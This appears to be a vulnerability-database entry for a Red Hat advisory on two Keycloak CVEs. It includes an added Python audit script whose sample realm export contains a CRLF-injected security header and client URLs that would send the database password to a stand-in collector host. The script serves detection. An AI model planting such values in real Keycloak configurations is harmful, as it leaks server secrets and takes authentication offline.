Red Hat Security Advisory: Red Hat build of Keycloak 26.0.8 Images Update
Red Hat build of Keycloak is an integrated sign-on solution, available as a Red Hat JBoss Middleware for OpenShift containerized image. The Red Hat build of Keycloak for OpenShift image provides an authentication server that you can use to log in centrally, log out, and register. You can also manage user accounts for web applications, mobile applications, and RESTful web services. Red Hat build of Keycloak Operator for OpenShift simplifies deployment and management of Keycloak 26.0.8 clusters. This erratum releases new images for Red Hat build of Keycloak 26.0.8 for use within the OpenShift Container Platform cloud computing Platform-as-a-Service (PaaS) for on-premise or private cloud deployments, aligning with the standalone product release.
Security fixes:
- Denial of Service in Keycloak Server via Security Headers (CVE-2024-11734)
- Unrestricted admin use of system and environment variables (CVE-2024-11736)
AI Analysis
Technical Summary
This advisory addresses two vulnerabilities in the Red Hat build of Keycloak 26.0.8 for OpenShift. CVE-2024-11734 is a denial of service in the Keycloak server: a user with permission to change realm settings can insert line breaks into one of the configurable browser security header values, and the server then fails while writing responses that carry that header. CVE-2024-11736 lets a realm administrator read sensitive server environment variables and system properties: placeholders of the form ${env.NAME} or ${property} placed in admin-configurable URLs (a client's admin URL or backchannel logout URL) are expanded with the server's actual values when the URL is processed. Red Hat has released updated container images aligned with the standalone Keycloak 26.0.8 release to remediate both issues. The advisory applies to containerized deployments on OpenShift Container Platform and ships a matching update of the Keycloak Operator image.
Potential Impact
Both issues require an authenticated Keycloak administrator with rights over realm or client configuration, so the realistic threat is a compromised, over-privileged or malicious admin account rather than an anonymous attacker. The denial of service (CVE-2024-11734) causes requests that carry the modified security header to fail, making the authentication server unavailable to the users of that realm. CVE-2024-11736 is an information disclosure rather than a configuration change: the environment variables and system properties of the Keycloak process commonly hold secrets such as database credentials (Keycloak itself reads KC_DB_PASSWORD from the environment), so exposing them to a realm admin can give that account access well beyond what it was granted. Both vulnerabilities affect the authentication server that provides centralized login and user management for web, mobile, and RESTful applications deployed via OpenShift. No known exploits in the wild have been reported at this time.
Mitigation Recommendations
Red Hat has released updated container images for the Red Hat build of Keycloak 26.0.8 and its Operator to address these vulnerabilities. Users should roll out these updated images as provided by Red Hat. Before applying this update, ensure all previously released relevant errata have been applied; detailed update instructions are available from Red Hat's official documentation. Because Keycloak runs in the customer's own OpenShift cluster rather than as a vendor-operated service, remediation requires the cluster operator to pull and deploy the new images, and the rollout should be confirmed by checking that every Keycloak and Operator pod reports the updated image reference. No alternative mitigations or workarounds are specified in the advisory; since both issues need an administrator account, keeping realm-management roles to the minimum set of accounts and reviewing admin events for unexpected changes to security headers or client URLs limits exposure until the images are updated.
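As a check a practitioner can run against their own realms before and after the rollout, here is an added example; it is not part of the advisory or of Keycloak's own code. It scans a realm export JSON for the two admin-configurable conditions behind the fixed CVEs: line breaks inside browser security header values (CVE-2024-11734) and ${env.NAME} or ${property} placeholders in client admin and backchannel logout URLs (CVE-2024-11736). The field names follow the standard realm export layout (browserSecurityHeaders, clients[].adminUrl, clients[].attributes["backchannel.logout.url"]); the sample export, its client IDs and hostnames are constructed for the demonstration.

```python
"""Audit a Keycloak realm export for the two admin-side conditions fixed in
RHSA-2025:0299 (CVE-2024-11734, CVE-2024-11736).

Added example, not code from the advisory or from Keycloak. It assumes the
standard realm-export JSON layout and embeds a constructed sample export.
"""
import json
import re
import sys

# CVE-2024-11734: a realm admin can put CR/LF into a security header value;
# responses carrying that header then fail, taking the realm offline.
CONTROL_CHARS = re.compile(r"[\r\n\x00]")

# CVE-2024-11736: ${env.NAME} or ${property} placeholders in admin-editable
# URLs are expanded with the server's environment / system properties.
PLACEHOLDER = re.compile(r"\$\{[^}]*\}")


def audit_realm(realm: dict) -> list:
    """Return one finding dict per suspicious value in a realm export."""
    findings = []

    headers = realm.get("browserSecurityHeaders") or {}
    for name, value in headers.items():
        if isinstance(value, str) and CONTROL_CHARS.search(value):
            findings.append({
                "cve": "CVE-2024-11734",
                "where": f"browserSecurityHeaders.{name}",
                "value": value,
            })

    for client in realm.get("clients") or []:
        client_id = client.get("clientId", "<unknown>")
        attrs = client.get("attributes") or {}
        # Only the two URL fields named in the CVE description are checked.
        urls = {
            "adminUrl": client.get("adminUrl"),
            "attributes.backchannel.logout.url": attrs.get("backchannel.logout.url"),
        }
        for field, url in urls.items():
            if isinstance(url, str) and PLACEHOLDER.search(url):
                findings.append({
                    "cve": "CVE-2024-11736",
                    "where": f"clients[{client_id}].{field}",
                    "value": url,
                })
    return findings


def audit_export_text(text: str) -> list:
    """Parse a realm export (Admin Console partial export or kc.sh export) and audit it."""
    return audit_realm(json.loads(text))


# Constructed sample export: one clean client and one showing both issues.
SAMPLE_EXPORT = {
    "realm": "demo",
    "browserSecurityHeaders": {
        "xFrameOptions": "SAMEORIGIN",
        "contentSecurityPolicy": "frame-src 'self'\r\nX-Injected: 1",
    },
    "clients": [
        {
            "clientId": "app-ok",
            "adminUrl": "https://app.example.internal/k_admin",
            "attributes": {"backchannel.logout.url": "https://app.example.internal/logout"},
        },
        {
            "clientId": "app-suspicious",
            "adminUrl": "https://collector.example/${env.KC_DB_PASSWORD}",
            "attributes": {"backchannel.logout.url": "https://collector.example/${java.home}"},
        },
    ],
}

if __name__ == "__main__":
    # Usage: python audit_realm.py realm-export.json   (no argument: audit the sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else json.dumps(SAMPLE_EXPORT)
    for finding in audit_export_text(text):
        print(f"{finding['cve']}  {finding['where']}  {finding['value']!r}")
```

A hit does not prove exploitation, but neither pattern has a legitimate use in those fields, so each one is worth tracing back through the realm's admin events to the account that set it. Pair the audit with confirming the rollout itself: every Keycloak and Operator pod in the namespace should report the updated image reference, for example from the output of `oc get pods -o jsonpath='{.items[*].spec.containers[*].image}'`.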
Technical Details
- Gcve Source: db.gcve.eu
- Csaf Category: csaf_security_advisory
- Csaf Version: 2.0
- Publisher: Red Hat Product Security
- Advisory Id: RHSA-2025:0299
- Cve Count: 2
- Additional Cves: CVE-2024-11736
- Cvss Version: null
Threat ID: 6a3c0cf1eed863c81e2392f9
Added to database: 06/24/2026, 16:59:29 UTC
Last enriched: 06/24/2026, 17:06:25 UTC
Last updated: 07/03/2026, 21:59:09 UTC